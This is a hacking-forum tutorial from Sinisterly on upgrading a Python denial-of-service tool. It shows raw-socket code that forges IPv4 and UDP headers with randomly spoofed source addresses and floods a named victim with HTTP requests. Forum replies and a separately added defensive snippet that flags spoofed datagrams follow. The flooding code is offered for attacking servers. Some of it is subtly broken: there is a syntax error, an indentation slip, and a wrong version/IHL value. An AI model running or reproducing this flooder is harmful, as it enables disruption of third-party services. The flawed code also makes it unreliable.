Sinisterly

PyDoSing extended 2 - Upgrading your python DOS tool SPOOFING
These tutorials require no order, you may do them in any order you like.
Previous - https://www.sinister.ly/Thread-Tutorial-...ARALLELISM
First - https://www.sinister.ly/Thread-PyDoSing-...n-DoS-Tool

This tutorial will go in depth into how packets are made, and we will be using VERY low-level socket functions in this tutorial. It might benefit you to open up Notepad and copy/paste the following ASCII pictures.

Pictures!
IPv4 Header packet:
Code:
IPv4 Header:
|-----------------------------------------------------------------------------------------------|
|           0           |           1           |           2           |           3           |
|-----------------------|-----------------------|-----------------------|-----------------------|
|0  1  2  3 |4  5  6  7 |8  9  10 11 12 13|14 15|16 17 18 19 20 21 22 23|24 25 26 27 28 29 30 31|
|-----------|-----------|-----------------|-----|-----------------------------------------------|
|  Version  |   IHL     |      DSCP       | ECN |                  Total Length                 |
|-----------------------------------------------|-----------------------------------------------|
|                 Identification                |  Flags |       Fragment offset                |
|-----------------------------------------------|-----------------------------------------------|
|    Time to live       |         Protocol      |                Header Checksum                |
|-----------------------------------------------------------------------------------------------|
|                                        Source IP Address                                      |
|-----------------------------------------------------------------------------------------------|
|                                       Destination IP Address                                  |
|-----------------------------------------------------------------------------------------------|
IPv6 Header:
Code:
IPv6 Header:
|-----------------------------------------------------------------------------------------------|
|           0           |           1           |           2           |           3           |
|-----------------------------------------------|-----------------------|-----------------------|
|0  1  2  3 |4  5  6  7  8  9  10 11|12 13 14 15|16 17 18 19 20 21 22 23|24 25 26 27 28 29 30 31|
|-----------|-----------------------|-----------|-----------------------------------------------|
|  Version  |     Traffic class     |                      Flow label                           |
|-----------------------------------------------------------------------------------------------|
|                    Length                     |       Next header     |       Hop limit       |
|-----------------------------------------------------------------------------------------------|
|                                                                                               |
|                                         Source Address                                        |
|                                                                                               |
|                                                                                               |
|-----------------------------------------------------------------------------------------------|
|                                                                                               |
|                                      Destination Address                                      |
|                                                                                               |
|                                                                                               |
|-----------------------------------------------------------------------------------------------|
TCP packet Header:
Code:
TCP header:
|-----------------------------------------------------------------------------------------------|
|           0           |           1           |           2           |           3           |
|-----------------------|-----------------------|-----------------------|-----------------------|
|0  1  2  3 |4  5  6  7 |8  9  10 11 12 13|14 15|16 17 18 19 20 21 22 23|24 25 26 27 28 29 30 31|
|-----------------------------------------------|-----------------------------------------------|
|                   Source port                 |              Destination port                 |
|-----------------------------------------------|-----------------------------------------------|
|Data offset|Reserved|       Flags              |                 Window Size                   |
|-----------------------------------------------|-----------------------------------------------|
|                  Checksum                     |              Urgent pointer (if used)         |
|-----------------------------------------------------------------------------------------------|
UDP packet Header:
Code:
UDP Header:
|-----------------------------------------------------------------------------------------------|
|           0           |           1           |           2           |           3           |
|-----------------------|-----------------------|-----------------------|-----------------------|
|0  1  2  3 |4  5  6  7 |8  9  10 11 12 13|14 15|16 17 18 19 20 21 22 23|24 25 26 27 28 29 30 31|
|-----------------------------------------------|-----------------------------------------------|
|                  Source Port                  |             Destination Port                  |
|-----------------------------------------------|-----------------------------------------------|
|                    Length                     |                    Checksum                   |
|-----------------------------------------------------------------------------------------------|

The numbers at the very top are the bytes, while the numbers below them are bits. The entire diagram represents the packet we want to send.

At the heart of DoS'ing is networking, and I will be explaining how to construct your packets from scratch, which means you can spoof any information you want in it.

Constructing a packet
There are multiple parts to a packet, depending on what protocol you are using. To start off, you ALWAYS need an IPv4/IPv6 header, and then a UDP/TCP header. Be aware that there are IPv6 "Jumbograms" that might (depending on the service you're attacking) be useful in upping the attack power of a DoS. Jumbograms do not use UDP/TCP.

For the purposes of this tutorial, I will modify the DOS tool from the original script to send an IPv4 packet, using UDP, with a spoofed IP address.

Makeing an IPv4 Header:
A while ago, I wrote a script that constructed packets from scratch; I'm simply copy/pasting the code here.
Code:
##Get the ip address of our victim and store it in a variable "victim"
spoof = str(random.randint(0,255))+"."+str(random.randint(0,255))+"."+str(random.randint(0,255))+"."+str(random.randint(0,255))
ipheader = pack('!BBHHHBBH4s4s',
              85, #IHL version
              0, #Type of service
              0, #Total length, will automatically fill in correct lenghth
              54321, #Global id of this packet
              0, #Fragment offset
              255, #Time to live
              socket.IPPROTO_UDP, #Protocol
              0, #Header checksum, will automatically fill
              socket.inet_aton(spoof), #Our spoofed IP address
              socket.inet_aton(victim)) #The IP address of our victim
The 'pack' function is imported from a library called 'struct', which allows us to pack variables as binary data. Paraphrasing from the python reference here:
Character (!) - network (= big-endian)
Size: Standard
Alignment: None

Format characters:

Character (B) - Unsigned Char
Python type: Integer
Standard size: 1
Notes: When attempting to pack a non-integer using any of the integer conversion codes, if the non-integer has a __index__() method then that method is called to convert the argument to an integer before packing.

Character (H) - Unsigned Short
Python type: Integer
Standard size: 2
Notes: When attempting to pack a non-integer using any of the integer conversion codes, if the non-integer has a __index__() method then that method is called to convert the argument to an integer before packing.

Character (s) - char[]
Python type: Bytes
Standard size: *

If you refer to those pretty pictures in your notepad, you'll see that '!BBHHHBBH4s4s' corresponds with the diagram for the IPv4 packet.

Making a UDP header
Now, we need a UDP packet, refer to the diagram. You'll notice that there's a big 2-byte slot called a "checksum". These are 2 bytes for the target computer to check that it got all the data, and none of it was lost along the way. Since we really don't care about our data being correct, we can save some processor cycles and leave it blank. To be sure you know how to use the pack function, go ahead and create the UDP header, and check it with the code below.
Code:
udpheader = pack('!HHHH',
                         0, #Source port
                         80, #Destination port, depends on the protocol the server is useing, 80 is commonly used for websites.
                         0, #Length, automatically filled in
                         0) #Checksum, left blank

The payload
Now that we have the IPv4 and UDP headers, all that is left is the payload. The payload can be anything you want. If you send a valid request, you can even tie up some server resources. Since I used port 80 in my UDP header, and port 80 is used for HTTP, I'll send an HTTP request. If you're attacking different servers, look up the RFC to see what port they run on, and what a valid request might be.

Code:
httpget = b'GET /index.html HTTP/1.1\nHost: www.example.com'
packet = ipheader+ udpheader + httpget

Bringing it all together
And finally, we can integrate this all back into our DoS script, with a socket type of SOCK_RAW
Code:
##import socket, struct, and Random
##Get a target, and port to attack

def makepacket(victim, port):
    spoof = str(random.randint(0,255))+"."+str(random.randint(0,255))+"."+str(random.randint(0,255))+"."+str(random.randint(0,255))
    ipheader = pack('!BBHHHBBH4s4s',
                  85, #IHL version
                  0, #Type of service
                  0, #Total length, will automatically fill in correct lenghth
                  54321, #Global id of this packet
                  0, #Fragment offset
                  255, #Time to live
                  socket.IPPROTO_UDP, #Protocol
                  0, #Header checksum, will automatically fill
                  socket.inet_aton(spoof), #Our spoofed IP address
                  socket.inet_aton(victim)) #The IP address of our victim
     udpheader = pack('!HHHH',
                             0, #Source port
                             80, #Destination port, depends on the protocol the server is useing, 80 is commonly used for websites.
                             0, #Length, automatically filled in
                             0) #Checksum, filled in later
    httpget = b'GET /index.html HTTP/1.1\nHost: www.example.com'
    packet = ipheader+ udpheader + httpget
    return packet


def dos(target, port,packet):
    try:
      (socket.socket(socket.AF_INET,,socket.SOCK_RAW,socket.IPPROTO_RAW)).send(packet)
    except error: pass

if __name__ == '__main__':
    for i in range(0,(random.randint(5000,50000))):
        dos(targ,por,makepacket(targ, por))


I put a lot of work into writing this tutorial, if you copy/paste it somewhere else, or see it somewhere else, please link back here!

Next - https://www.sinister.ly/Thread-Tutorial-...ol-METHODS

Thanks for reading! Comments, criticisms, etc. below!
(04-15-2014, 12:11 AM)3SidedSquare Wrote: [ -> ]Makeing an IPv4 Header:

>Makeing
Most domestic ISPs have started to check source IPs of outgoing packets, meaning for most people you won't be spoofing.
(04-18-2014, 02:04 AM)w00t Wrote: [ -> ]Most domestic ISPs have started to check source IPs of outgoing packets, meaning for most people you won't be spoofing.

I wasn't aware, could you point me to a list of popular ISPs that do this so I can add it to the OP?
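
The source-address checking mentioned in the replies, seen from the filtering side, as an added example that is not part of the original thread: it unpacks the IPv4 and UDP headers with the same struct formats shown in the diagrams and lists the reasons an egress filter or sensor would flag a datagram. `LOCAL_PREFIXES`, `inspect_datagram` and the sample bytes are constructed for illustration.

```python
import ipaddress
import struct

# Assumption: prefixes legitimately used inside the filtered network (documentation range).
LOCAL_PREFIXES = [ipaddress.ip_network("198.51.100.0/24")]

# Constructed sample datagrams (IPv4 + UDP + 4-byte payload), not captured traffic.
GOOD = bytes.fromhex("450000200001000040110000c6336407c000020a"
                     "14e90035000c0000" "74657374")
SPOOFED = bytes.fromhex("4500002000010000ff110000cb007109c000020a"
                        "0000005000000000" "74657374")


def inspect_datagram(raw, local_prefixes=LOCAL_PREFIXES):
    """Return the reasons an egress filter or sensor would flag this datagram."""
    if len(raw) < 20:
        return ["truncated IPv4 header"]
    (ver_ihl, _tos, total_len, _ident, _frag, _ttl, proto, _csum,
     src, _dst) = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    # The first byte carries two 4-bit fields: version (high) and IHL in 32-bit words (low).
    version, ihl = ver_ihl >> 4, (ver_ihl & 0x0F) * 4
    findings = []
    if version != 4 or ihl < 20:
        findings.append(f"bad version/IHL byte 0x{ver_ihl:02x}")
        ihl = 20  # continue at the minimum header length
    if total_len != len(raw):  # assumes raw is exactly one IP datagram
        findings.append("IP total length mismatch")
    src_ip = ipaddress.IPv4Address(src)
    if src_ip.is_multicast or src_ip.is_loopback or src_ip.is_reserved:
        findings.append(f"source {src_ip} can never be a valid sender")
    elif not any(src_ip in net for net in local_prefixes):
        # Source address validation: only our own prefixes may leave the network.
        findings.append(f"source {src_ip} outside local prefixes")
    if proto == 17 and len(raw) >= ihl + 8:  # 17 = UDP
        _sport, _dport, udp_len, _ucsum = struct.unpack("!HHHH", raw[ihl:ihl + 8])
        if udp_len != len(raw) - ihl:
            findings.append("UDP length mismatch")
    return findings


if __name__ == "__main__":
    for name, pkt in (("good", GOOD), ("spoofed", SPOOFED)):
        print(name, inspect_datagram(pkt))
```
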